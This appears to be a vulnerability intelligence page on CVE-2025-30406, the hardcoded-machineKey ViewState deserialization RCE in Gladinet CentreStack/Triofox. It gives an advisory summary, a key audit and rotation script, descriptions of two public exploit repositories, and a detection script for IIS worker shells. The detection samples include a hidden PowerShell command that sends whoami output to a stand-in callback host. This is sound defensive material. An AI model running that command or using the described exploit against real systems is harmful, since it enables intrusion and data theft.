Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization RCE
CVE-2025-30406 is a critical deserialization vulnerability in Gladinet CentreStack through 16.1.10296.56315 and in the related Triofox releases that predate the vendor fixes shipped in April 2025. The root cause is a hardcoded ASP.NET machineKey in the portal's IIS web.config. ASP.NET uses the machineKey's validationKey to MAC ViewState and its decryptionKey to encrypt it, so the server treats any ViewState carrying a valid MAC as trustworthy and deserializes it. Because the key shipped identically in every installation, anyone who read it once could sign a ViewState payload built from a known .NET deserialization gadget chain (the public exploits use ysoserial.net) and have the portal execute arbitrary commands as the IIS application pool identity; the public exploits deliver it to the pre-authentication login page, /portal/loginpage.aspx. Reporting indicates exploitation in the wild from March 2025, and the CVE was added to CISA's KEV catalog. Gladinet fixed it by updating or removing the hardcoded machineKey values in the affected configuration files. Some reporting also notes that administrators of legacy deployments must manually delete or rotate the machineKey in portal\web.config to fully remediate: patching alone does not help while the old key remains, because an attacker who already holds it can keep forging ViewState. When rotating, generate the new keys with a CSPRNG, keep them identical across all nodes of a web farm, recycle the application pool so the new values take effect, and treat any host that exposed the old key to the internet as potentially compromised.
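The remediation step above is a configuration check and a key rotation. The script below, added here as an example and not Gladinet's code or anything from the page's exploit repositories, audits an ASP.NET web.config for a <machineKey> whose values match a known shipped key or a deprecated algorithm, and writes back a replacement generated with a CSPRNG. It assumes the portal config is an ordinary ASP.NET web.config; both sample configs and the KNOWN_SHIPPED_KEYS values are constructed stand-ins, since the real vendor key is deliberately not reproduced. It generalizes beyond CentreStack to any ASP.NET deployment that ships a static key.

```python
"""Audit an ASP.NET web.config for a hardcoded <machineKey> and emit a rotated one.

Added example, not Gladinet's code nor anything from the page's exploit repos.
Assumes the portal web.config is an ordinary ASP.NET config with a
<system.web><machineKey/> element. Key values and the KNOWN_SHIPPED_KEYS set
below are constructed stand-ins; the real vendor key is deliberately not reproduced.
"""
import secrets
import xml.etree.ElementTree as ET

# Constructed: the weak shape the advisory describes, one fixed key in every install.
VULNERABLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>
"""

# Constructed: no <machineKey> at all, so ASP.NET falls back to AutoGenerate,IsolateApps.
AUTOGEN_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <httpRuntime targetFramework="4.7.2" />
  </system.web>
</configuration>
"""

# Key material known to be shared or public (stand-in values). In practice populate
# this from the vendor advisory or your own inventory of vendor-shipped configs.
KNOWN_SHIPPED_KEYS = {"ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789",
                      "0123456789ABCDEF0123456789ABCDEF"}
WEAK_VALIDATION = {"MD5", "SHA1"}
WEAK_DECRYPTION = {"DES", "3DES"}


def audit_machine_key(config_xml, known_keys=KNOWN_SHIPPED_KEYS):
    """Return {'present', 'validation', 'findings': [(severity, message), ...]}."""
    root = ET.fromstring(config_xml)
    mk = root.find("./system.web/machineKey")
    if mk is None:
        return {"present": False, "validation": None, "findings": []}
    findings = []
    for attr in ("validationKey", "decryptionKey"):
        value = mk.get(attr, "AutoGenerate,IsolateApps")
        if value.startswith("AutoGenerate"):
            continue
        if value.upper() in known_keys:
            findings.append(("critical", f"{attr} is a known vendor-shipped/public key; "
                                         "ViewState can be forged by anyone"))
        else:
            # Static keys are legitimate for web farms; the question is uniqueness.
            findings.append(("info", f"{attr} is static; confirm it is unique to this deployment"))
    validation = mk.get("validation", "HMACSHA256").upper()
    if validation in WEAK_VALIDATION:
        findings.append(("medium", f"validation={validation} is a deprecated MAC algorithm"))
    if mk.get("decryption", "AES").upper() in WEAK_DECRYPTION:
        findings.append(("medium", "decryption algorithm is deprecated; use AES"))
    return {"present": True, "validation": validation, "findings": findings}


def new_machine_key():
    """Fresh CSPRNG keys: 64 bytes for HMACSHA256 validation, 32 bytes for AES-256."""
    return {"validationKey": secrets.token_hex(64).upper(),
            "decryptionKey": secrets.token_hex(32).upper(),
            "validation": "HMACSHA256", "decryption": "AES"}


def rotate_machine_key(config_xml, keys=None):
    """Return config_xml with <machineKey> replaced (or added) using fresh keys."""
    keys = keys or new_machine_key()
    root = ET.fromstring(config_xml)
    system_web = root.find("./system.web")
    if system_web is None:
        system_web = ET.SubElement(root, "system.web")
    mk = system_web.find("machineKey")
    if mk is None:
        mk = ET.SubElement(system_web, "machineKey")
    mk.attrib.clear()
    mk.attrib.update(keys)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for severity, msg in audit_machine_key(VULNERABLE_WEB_CONFIG)["findings"]:
        print(f"[{severity}] {msg}")
    rotated = rotate_machine_key(VULNERABLE_WEB_CONFIG)
    print(rotated)
    print("after rotation:", audit_machine_key(rotated)["findings"])
```

Rotation invalidates every outstanding ViewState and forms-authentication ticket, so users are logged out once the application pool recycles; in a web farm the same rotated values must be written to every node before that recycle, and the vendor's own post-patch instructions for the config file take precedence over a generic rewrite like this one.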
Exploits
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
This repository is a proof-of-concept (PoC) exploit for CVE-2025-30406, a ViewState deserialization vulnerability in ASP.NET applications. It consists of two Python scripts:
1. exploit.py is the primary exploit script. It uses ysoserial to generate a malicious ViewState payload signed with a hardcoded validation key and __VIEWSTATEGENERATOR value; the payload executes an arbitrary command on the target server. If a callback URL is provided, the command is wrapped in PowerShell so that its output is sent to an attacker-controlled HTTP server via an HTTP GET. The script POSTs the payload to a user-specified vulnerable ASP.NET endpoint in the __VIEWSTATE parameter.
2. server.py is a simple HTTP server that listens (by default on port 8000) for GET requests carrying the exfiltrated command output and prints it with timestamps and colored prompts for readability.
The repository also includes a detailed README.md with setup, usage instructions, and ethical warnings. The exploit requires the attacker to know the target's ViewState validation key and generator and to have ysoserial available; it is a PoC rather than a weaponized tool, since it needs manual setup and hardcoded values. The attack vector is network-based, over HTTP to the vulnerable ASP.NET endpoint. Fingerprintable artifacts are the POST to the target ASP.NET URL and the outbound GET from the target to the attacker's callback server.
This repository provides a working exploit for CVE-2025-30406, a critical remote code execution vulnerability in Gladinet CentreStack and Triofox (tested on version 16.1.10296.56315 for Windows). The exploit is implemented in C# (.NET 4.7.2) and generates a malicious ViewState payload containing a serialized XAML object (rce.txt) that triggers arbitrary command execution on the target server. The main entry point is Program.cs, which handles ViewState generation and signing. The README gives usage instructions, including how to use ysoserial.net to generate payloads, and targets the vulnerable endpoint /portal/loginpage.aspx. The exploit requires knowledge of the ViewState validation key, which the README provides for demonstration. The payload can be customized to execute arbitrary commands, either by modifying the XAML or by sending the command in a custom 'cmd' HTTP header. The repository also references public advisories and detection templates. No evidence of fake or detection-only code was found; this is a functional RCE exploit via .NET deserialization.
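Both exploits above end the same way on the target: the IIS worker process deserializes the forged ViewState and spawns a shell, and the first PoC additionally has that shell call back over HTTP. The script below, added here as an example and not code from either repository or from Gladinet, is the corresponding detection run over process-creation telemetry. The events are constructed in the style of Sysmon Event ID 1 records (Image, ParentImage, CommandLine, User are Sysmon's field names); 203.0.113.10 is a documentation address standing in for the attacker's callback server.

```python
"""Detect an IIS worker spawning a shell, the post-exploitation shape of CVE-2025-30406.

Added example, not code from either exploit repository or from Gladinet. The
events are constructed in the style of Sysmon Event ID 1 (process creation)
records; field names follow Sysmon's (Image, ParentImage, CommandLine, User)
and the callback host 203.0.113.10 is a documentation address.
"""
import re

IIS_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe"}
# Children w3wp.exe spawns legitimately (ASP.NET dynamic compilation, console host).
EXPECTED_CHILDREN = {"csc.exe", "vbc.exe", "cvtres.exe", "conhost.exe"}
# Command-line fragments that talk HTTP, matching the PoC's GET-based exfiltration.
CALLBACK_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient|"
    r"downloadstring|\bcurl\b|\bwget\b", re.I)

SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'w3wp.exe -ap "CentreStack"', "User": r"IIS APPPOOL\CentreStack"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe /c whoami", "User": r"IIS APPPOOL\CentreStack"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "Invoke-WebRequest '
                    "('http://203.0.113.10:8000/?out=' + (whoami))\"",
     "User": r"IIS APPPOOL\CentreStack"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe", "User": r"CORP\admin"},         # admin at the console
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "csc.exe /noconfig /fullpaths @c:\\temp\\x.cmdline",
     "User": r"IIS APPPOOL\CentreStack"},                      # normal page compile
    {"Image": r"C:\Windows\Temp\svc.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "svc.exe", "User": r"IIS APPPOOL\CentreStack"},
]


def basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return alerts for children of an IIS worker that are not expected compile helpers."""
    alerts = []
    for e in events:
        parent, child = basename(e.get("ParentImage", "")), basename(e.get("Image", ""))
        if parent not in IIS_WORKERS or child in EXPECTED_CHILDREN:
            continue
        cmd = e.get("CommandLine", "")
        if child in SHELLS:
            severity, reason = "high", f"{parent} spawned {child}"
            if CALLBACK_RE.search(cmd):
                severity = "critical"
                reason += " with an HTTP callback in the command line"
        else:
            severity, reason = "medium", f"{parent} spawned unexpected child {child}"
        alerts.append({"severity": severity, "reason": reason,
                       "user": e.get("User", ""), "cmdline": cmd})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['reason']} ({a['user']}): {a['cmdline']}")
```

The allowlist matters: ASP.NET compiles pages on first hit by launching csc.exe from w3wp.exe, so a rule that fires on any child of the worker will page you on every deployment. Pair this with the hunt for the delivery side, POST requests to /portal/loginpage.aspx around the time of the alert in the IIS logs, since the request body with the forged __VIEWSTATE is not logged by default.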
Recent activity
43 sources tracked across advisories, community write-ups, and news.
A critical Gladinet CentreStack/Triofox vulnerability involving a hard-coded cryptographic key (MachineKey) enabling remote code execution; actively exploited and added to CISA KEV.
A critical Gladinet CentreStack/Triofox vulnerability caused by hardcoded machine keys that enables server-side deserialization and remote code execution.
A vulnerability in earlier versions of CentreStack and Triofox where a hardcoded machine key allows remote code execution via ViewState deserialization.
A separate local file inclusion vulnerability in Gladinet CentreStack and Triofox that allows a local attacker to access system files without authentication.